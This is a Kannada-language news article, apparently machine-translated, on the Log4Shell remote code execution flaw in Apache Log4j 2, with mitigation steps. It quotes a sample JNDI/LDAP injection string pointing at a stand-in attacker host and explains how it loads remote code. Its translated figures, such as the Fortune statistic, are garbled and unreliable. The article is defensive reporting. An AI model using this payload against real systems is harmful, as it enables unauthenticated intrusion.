Log4Shell, Apache Log4j 2 ನಲ್ಲಿನ ನಿರ್ಣಾಯಕ ದುರ್ಬಲತೆ ಇದು ಅನೇಕ ಜಾವಾ ಯೋಜನೆಗಳ ಮೇಲೆ ಪರಿಣಾಮ ಬೀರುತ್ತದೆ

Darkcrizt

4 ನಿಮಿಷಗಳು

ಇತ್ತೀಚೆಗೆ ರುe Apache Log4j 2 ನಲ್ಲಿ ನಿರ್ಣಾಯಕ ದುರ್ಬಲತೆಯನ್ನು ಗುರುತಿಸಲಾಗಿದೆ ಎಂಬ ಸುದ್ದಿಯನ್ನು ಬಿಡುಗಡೆ ಮಾಡಿದೆ, ಇದು ಜಾವಾ ಅಪ್ಲಿಕೇಶನ್‌ಗಳಲ್ಲಿ ನೋಂದಾವಣೆ ಸಂಘಟಿಸಲು ಜನಪ್ರಿಯ ಚೌಕಟ್ಟಾಗಿ ನಿರೂಪಿಸಲ್ಪಟ್ಟಿದೆ, ವಿಶೇಷವಾಗಿ ಫಾರ್ಮ್ಯಾಟ್ ಮಾಡಲಾದ ಮೌಲ್ಯವನ್ನು "{jndi: URL}" ಫಾರ್ಮ್ಯಾಟ್‌ನಲ್ಲಿ ನೋಂದಾವಣೆಗೆ ಬರೆಯುವಾಗ ಅನಿಯಂತ್ರಿತ ಕೋಡ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು ಅನುವು ಮಾಡಿಕೊಡುತ್ತದೆ.

ದುರ್ಬಲತೆ ಇದು ಗಮನಾರ್ಹವಾಗಿದೆ ಏಕೆಂದರೆ ದಾಳಿಯನ್ನು ಜಾವಾ ಅಪ್ಲಿಕೇಶನ್‌ಗಳಲ್ಲಿ ನಡೆಸಬಹುದುಅವರು ಬಾಹ್ಯ ಮೂಲಗಳಿಂದ ಪಡೆದ ಮೌಲ್ಯಗಳನ್ನು ದಾಖಲಿಸುತ್ತಾರೆ, ಉದಾಹರಣೆಗೆ ದೋಷ ಸಂದೇಶಗಳಲ್ಲಿ ಸಮಸ್ಯಾತ್ಮಕ ಮೌಲ್ಯಗಳನ್ನು ಪ್ರದರ್ಶಿಸುವ ಮೂಲಕ.

ಎಂದು ಗಮನಿಸಲಾಗಿದೆ Apache Struts, Apache Solr, Apache Druid ಅಥವಾ Apache Flink ನಂತಹ ಚೌಕಟ್ಟುಗಳನ್ನು ಬಳಸುವ ಬಹುತೇಕ ಎಲ್ಲಾ ಯೋಜನೆಗಳು ಪರಿಣಾಮ ಬೀರುತ್ತವೆ, ಸ್ಟೀಮ್, Apple iCloud, Minecraft ಕ್ಲೈಂಟ್‌ಗಳು ಮತ್ತು ಸರ್ವರ್‌ಗಳು ಸೇರಿದಂತೆ.

ದೌರ್ಬಲ್ಯವು ವ್ಯಾಪಾರ ಅಪ್ಲಿಕೇಶನ್‌ಗಳ ಮೇಲೆ ಭಾರಿ ದಾಳಿಯ ಅಲೆಗೆ ಕಾರಣವಾಗಬಹುದು ಎಂದು ನಿರೀಕ್ಷಿಸಲಾಗಿದೆ, ಅಪಾಚೆ ಸ್ಟ್ರಟ್ಸ್‌ನ ಚೌಕಟ್ಟಿನಲ್ಲಿನ ನಿರ್ಣಾಯಕ ದುರ್ಬಲತೆಗಳ ಇತಿಹಾಸವನ್ನು ಪುನರಾವರ್ತಿಸುತ್ತದೆ, ಇದು ಫಾರ್ಚೂನ್ 65 ವೆಬ್ ಅಪ್ಲಿಕೇಶನ್‌ಗಳಲ್ಲಿ 100% ರಷ್ಟು ಬಳಸಲಾಗಿದೆ. ಕಂಪನಿಯ ವೆಬ್ ಅಪ್ಲಿಕೇಶನ್‌ಗಳು ಈಗಾಗಲೇ ಒಳಗೊಂಡಿವೆ ದುರ್ಬಲ ವ್ಯವಸ್ಥೆಗಳಿಗಾಗಿ ನೆಟ್‌ವರ್ಕ್ ಅನ್ನು ಸ್ಕ್ಯಾನ್ ಮಾಡುವ ಪ್ರಯತ್ನಗಳನ್ನು ದಾಖಲಿಸಲಾಗಿದೆ.

ದುರ್ಬಲತೆಯು ದೃಢೀಕರಿಸದ ಕೋಡ್‌ನ ರಿಮೋಟ್ ಎಕ್ಸಿಕ್ಯೂಶನ್ ಅನ್ನು ಅನುಮತಿಸುತ್ತದೆ. Log4j 2 ಎಂಬುದು ಅಪಾಚೆ ಫೌಂಡೇಶನ್‌ನಿಂದ ಅಭಿವೃದ್ಧಿಪಡಿಸಲಾದ ಮುಕ್ತ ಮೂಲ ಜಾವಾ ಲಾಗ್ ಲೈಬ್ರರಿಯಾಗಿದೆ. Log4j 2 ಅನ್ನು ಅನೇಕ ಅಪ್ಲಿಕೇಶನ್‌ಗಳಲ್ಲಿ ವ್ಯಾಪಕವಾಗಿ ಬಳಸಲಾಗುತ್ತದೆ ಮತ್ತು ಅನೇಕ ಸೇವೆಗಳಲ್ಲಿ ಅವಲಂಬನೆಯಾಗಿ ಇರುತ್ತದೆ. ಇವುಗಳಲ್ಲಿ ವ್ಯಾಪಾರ ಅಪ್ಲಿಕೇಶನ್‌ಗಳು ಮತ್ತು ಹಲವಾರು ಕ್ಲೌಡ್ ಸೇವೆಗಳು ಸೇರಿವೆ.

Randori ದಾಳಿ ತಂಡವು ಕ್ರಿಯಾತ್ಮಕ ಶೋಷಣೆಯನ್ನು ಅಭಿವೃದ್ಧಿಪಡಿಸಿದೆ ಮತ್ತು ನಮ್ಮ ಆಕ್ರಮಣಕಾರಿ ಭದ್ರತಾ ವೇದಿಕೆಯ ಭಾಗವಾಗಿ ಗ್ರಾಹಕರ ಪರಿಸರದಲ್ಲಿ ಈ ದುರ್ಬಲತೆಯನ್ನು ಯಶಸ್ವಿಯಾಗಿ ಬಳಸಿಕೊಳ್ಳಲು ಸಮರ್ಥವಾಗಿದೆ. 

ಬಹುಸಂಖ್ಯೆಯ ಅಪ್ಲಿಕೇಶನ್-ನಿರ್ದಿಷ್ಟ ವಿಧಾನಗಳ ಮೂಲಕ ದುರ್ಬಲತೆಯನ್ನು ಪ್ರವೇಶಿಸಬಹುದು. ವಾಸ್ತವವಾಗಿ, Log4j ಲೈಬ್ರರಿಯನ್ನು ಬಳಸುವ ಅಪ್ಲಿಕೇಶನ್ ಫೈಲ್‌ಗಳನ್ನು ಲಾಗ್ ಮಾಡಲು ಬರೆಯುವ ಅನಿಯಂತ್ರಿತ ಡೇಟಾವನ್ನು ಪೂರೈಸಲು ರಿಮೋಟ್ ಸಂಪರ್ಕವನ್ನು ಅನುಮತಿಸುವ ಯಾವುದೇ ಸನ್ನಿವೇಶವು ಶೋಷಣೆಗೆ ಒಳಗಾಗುತ್ತದೆ. ಈ ದುರ್ಬಲತೆಯನ್ನು ಕಾಡಿನಲ್ಲಿ ಬಳಸಿಕೊಳ್ಳುವ ಸಾಧ್ಯತೆ ಹೆಚ್ಚು ಮತ್ತು ಸಾವಿರಾರು ಸಂಸ್ಥೆಗಳ ಮೇಲೆ ಪರಿಣಾಮ ಬೀರುವ ಸಾಧ್ಯತೆಯಿದೆ. ಈ ದುರ್ಬಲತೆಯು ಪೀಡಿತ ವ್ಯವಸ್ಥೆಗಳಿಗೆ ಗಮನಾರ್ಹವಾದ ನೈಜ ಅಪಾಯವನ್ನು ಪ್ರತಿನಿಧಿಸುತ್ತದೆ.

ಕ್ರಿಯಾತ್ಮಕ ಶೋಷಣೆಯನ್ನು ಈಗಾಗಲೇ ಪ್ರಕಟಿಸಲಾಗಿದೆ ಎಂಬ ಅಂಶದಿಂದ ಸಮಸ್ಯೆಯು ಜಟಿಲವಾಗಿದೆ, ಉದಾ.ಆದರೆ ಸ್ಥಿರ ಶಾಖೆಗಳಿಗೆ ಪರಿಹಾರಗಳನ್ನು ಇನ್ನೂ ರಚಿಸಲಾಗಿಲ್ಲ. CVE ಗುರುತಿಸುವಿಕೆಯನ್ನು ಇನ್ನೂ ನಿಯೋಜಿಸಲಾಗಿಲ್ಲ. ಪರಿಹಾರವನ್ನು log4j-2.15.0-rc1 ಪರೀಕ್ಷಾ ಶಾಖೆಯಲ್ಲಿ ಮಾತ್ರ ಸೇರಿಸಲಾಗಿದೆ. ದುರ್ಬಲತೆಯನ್ನು ನಿರ್ಬಂಧಿಸಲು ಪರಿಹಾರವಾಗಿ, Log4j2.formatMsgNoLookups ಪ್ಯಾರಾಮೀಟರ್ ಅನ್ನು true ಗೆ ಹೊಂದಿಸಲು ಶಿಫಾರಸು ಮಾಡಲಾಗಿದೆ.

ಸಮಸ್ಯೆ ಲಾಗ್ ಲೈನ್‌ಗಳಲ್ಲಿ «{}» ವಿಶೇಷ ಮುಖವಾಡಗಳ ನಿರ್ವಹಣೆಯನ್ನು Log4j 2 ಬೆಂಬಲಿಸುತ್ತದೆ ಎಂಬ ಕಾರಣದಿಂದಾಗಿ, ಯಾವುದರಲ್ಲಿ JNDI ಪ್ರಶ್ನೆಗಳನ್ನು ರನ್ ಮಾಡಬಹುದು (ಜಾವಾ ಹೆಸರಿಸುವಿಕೆ ಮತ್ತು ಡೈರೆಕ್ಟರಿ ಇಂಟರ್ಫೇಸ್).

CVE-2021-44228 ಅನ್ನು ವಿಶ್ಲೇಷಿಸುವಲ್ಲಿ, ರಾಂಡೋರಿ ಈ ಕೆಳಗಿನವುಗಳನ್ನು ನಿರ್ಧರಿಸಿದ್ದಾರೆ:

ವ್ಯಾಪಕವಾಗಿ ಬಳಸಲಾಗುವ ವ್ಯಾಪಾರ ಸಾಫ್ಟ್‌ವೇರ್‌ನ ಡೀಫಾಲ್ಟ್ ಸ್ಥಾಪನೆಗಳು ದುರ್ಬಲವಾಗಿರುತ್ತವೆ.
ದುರ್ಬಲತೆಯನ್ನು ವಿಶ್ವಾಸಾರ್ಹವಾಗಿ ಮತ್ತು ದೃಢೀಕರಣವಿಲ್ಲದೆ ಬಳಸಿಕೊಳ್ಳಬಹುದು.
ದುರ್ಬಲತೆಯು Log4j 2 ರ ಬಹು ಆವೃತ್ತಿಗಳ ಮೇಲೆ ಪರಿಣಾಮ ಬೀರುತ್ತದೆ.
ಬಳಕೆದಾರರು ಲೈಬ್ರರಿಯನ್ನು ಬಳಸಿಕೊಂಡು ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ರನ್ ಮಾಡಿದಾಗ ದುರ್ಬಲತೆಯು ರಿಮೋಟ್ ಕೋಡ್ ಎಕ್ಸಿಕ್ಯೂಶನ್ ಅನ್ನು ಅನುಮತಿಸುತ್ತದೆ.

"$ {jndi: ldap: //example.com/a}" ಪರ್ಯಾಯದೊಂದಿಗೆ ಸ್ಟ್ರಿಂಗ್ ಅನ್ನು ರವಾನಿಸಲು ದಾಳಿಯು ಕುದಿಯುತ್ತದೆ, ಇದನ್ನು ಪ್ರಕ್ರಿಯೆಗೊಳಿಸುವುದರಿಂದ ಜಾವಾ ಕ್ಲಾಸ್‌ಗೆ ಹಾದಿಗಾಗಿ LDAP ವಿನಂತಿಯನ್ನು ಆಕ್ರಮಣಕಾರ.ಕಾಮ್ ಸರ್ವರ್‌ಗೆ ಕಳುಹಿಸುತ್ತದೆ. . ದಾಳಿಕೋರನ ಸರ್ವರ್‌ನಿಂದ ಹಿಂತಿರುಗಿಸಲಾದ ಮಾರ್ಗವನ್ನು (ಉದಾಹರಣೆಗೆ, http://example.com/Exploit.class) ಪ್ರಸ್ತುತ ಪ್ರಕ್ರಿಯೆಯ ಸಂದರ್ಭದಲ್ಲಿ ಲೋಡ್ ಮಾಡಲಾಗುತ್ತದೆ ಮತ್ತು ಕಾರ್ಯಗತಗೊಳಿಸಲಾಗುತ್ತದೆ, ಇದು ಹಕ್ಕುಗಳೊಂದಿಗೆ ಸಿಸ್ಟಮ್‌ನಲ್ಲಿ ಅನಿಯಂತ್ರಿತ ಕೋಡ್ ಎಕ್ಸಿಕ್ಯೂಶನ್ ಅನ್ನು ಸಾಧಿಸಲು ಆಕ್ರಮಣಕಾರರಿಗೆ ಅವಕಾಶ ನೀಡುತ್ತದೆ. ಪ್ರಸ್ತುತ ಅಪ್ಲಿಕೇಶನ್.

ಅಂತಿಮವಾಗಿ, ಅದನ್ನು ಉಲ್ಲೇಖಿಸಲಾಗಿದೆ ಅಸಹಜತೆಗಳು ಕಂಡುಬಂದರೆ, ಇದು ಸಕ್ರಿಯ ಘಟನೆ ಎಂದು ನೀವು ಊಹಿಸಲು ಶಿಫಾರಸು ಮಾಡಲಾಗಿದೆ, ಇದು ರಾಜಿ ಮಾಡಿಕೊಂಡಿದೆ ಮತ್ತು ಅದಕ್ಕೆ ಅನುಗುಣವಾಗಿ ಪ್ರತಿಕ್ರಿಯಿಸಿ. Log4j 2 ಅಥವಾ ಪೀಡಿತ ಅಪ್ಲಿಕೇಶನ್‌ಗಳ ಪ್ಯಾಚ್ ಮಾಡಿದ ಆವೃತ್ತಿಗಳಿಗೆ ಅಪ್‌ಗ್ರೇಡ್ ಮಾಡುವುದರಿಂದ ಈ ದುರ್ಬಲತೆಯನ್ನು ನಿವಾರಿಸುತ್ತದೆ. ಯಾವುದೇ ಸಂಸ್ಥೆಯು ಪರಿಣಾಮ ಬೀರಬಹುದು ಎಂದು ಭಾವಿಸುವ ಯಾವುದೇ ಸಂಸ್ಥೆಯನ್ನು ತುರ್ತಾಗಿ ಪ್ಯಾಚ್ ಮಾಡಿದ ಆವೃತ್ತಿಗೆ ಅಪ್‌ಗ್ರೇಡ್ ಮಾಡಿ ಎಂದು Randori ಶಿಫಾರಸು ಮಾಡುತ್ತಾರೆ.

Apache Log4j ತಂಡದ ಇತ್ತೀಚಿನ ಅಪ್‌ಡೇಟ್‌ನಲ್ಲಿ, ಸಂಸ್ಥೆಗಳು ಈ ಕೆಳಗಿನವುಗಳನ್ನು ಮಾಡಲು ಶಿಫಾರಸು ಮಾಡುತ್ತೇವೆ

  • Log4j 2.15.0 ಗೆ ನವೀಕರಿಸಿ
  • 2.15.0 ಗೆ ಅಪ್‌ಗ್ರೇಡ್ ಮಾಡಲು ಸಾಧ್ಯವಾಗದವರಿಗೆ: ಆವೃತ್ತಿಗಳಲ್ಲಿ> = 2.10, log4j2.formatMsgNoLookup ಸಿಸ್ಟಮ್ ಪ್ರಾಪರ್ಟಿ ಅಥವಾ LOG4J_FORMAT_MSG_NO_LOOKUPS ಪರಿಸರ ವೇರಿಯಬಲ್ ಅನ್ನು ಸರಿ ಎಂದು ಹೊಂದಿಸುವ ಮೂಲಕ ಈ ದುರ್ಬಲತೆಯನ್ನು ತಗ್ಗಿಸಬಹುದು.
  • 2,0-beta9 ರಿಂದ 2.10.0 ವರೆಗಿನ ಆವೃತ್ತಿಗಳಿಗೆ, ಕ್ಲಾಸ್‌ಪಾತ್‌ನಿಂದ JndiLookup ವರ್ಗವನ್ನು ತೆಗೆದುಹಾಕುವುದು ತಗ್ಗಿಸುವಿಕೆಯಾಗಿದೆ: zip -q -d log4j-core - *. Jar org / apache / logging / log4j / core / lookup /JndiLookup.class.

ಮೂಲ: https://www.lunasec.io/


ನಿಮ್ಮ ಅಭಿಪ್ರಾಯವನ್ನು ಬಿಡಿ

ನಿಮ್ಮ ಈಮೇಲ್ ವಿಳಾಸ ಪ್ರಕಟವಾದ ಆಗುವುದಿಲ್ಲ. ಅಗತ್ಯವಿರುವ ಜಾಗ ಗುರುತಿಸಲಾಗಿದೆ *

*

*

  1. ಡೇಟಾಗೆ ಜವಾಬ್ದಾರಿ: ಮಿಗುಯೆಲ್ ಏಂಜೆಲ್ ಗಟಾನ್
  2. ಡೇಟಾದ ಉದ್ದೇಶ: ನಿಯಂತ್ರಣ SPAM, ಕಾಮೆಂಟ್ ನಿರ್ವಹಣೆ.
  3. ಕಾನೂನುಬದ್ಧತೆ: ನಿಮ್ಮ ಒಪ್ಪಿಗೆ
  4. ಡೇಟಾದ ಸಂವಹನ: ಕಾನೂನುಬದ್ಧ ಬಾಧ್ಯತೆಯನ್ನು ಹೊರತುಪಡಿಸಿ ಡೇಟಾವನ್ನು ಮೂರನೇ ವ್ಯಕ್ತಿಗಳಿಗೆ ಸಂವಹನ ಮಾಡಲಾಗುವುದಿಲ್ಲ.
  5. ಡೇಟಾ ಸಂಗ್ರಹಣೆ: ಆಕ್ಸೆಂಟಸ್ ನೆಟ್‌ವರ್ಕ್‌ಗಳು (ಇಯು) ಹೋಸ್ಟ್ ಮಾಡಿದ ಡೇಟಾಬೇಸ್
  6. ಹಕ್ಕುಗಳು: ಯಾವುದೇ ಸಮಯದಲ್ಲಿ ನೀವು ನಿಮ್ಮ ಮಾಹಿತಿಯನ್ನು ಮಿತಿಗೊಳಿಸಬಹುದು, ಮರುಪಡೆಯಬಹುದು ಮತ್ತು ಅಳಿಸಬಹುದು.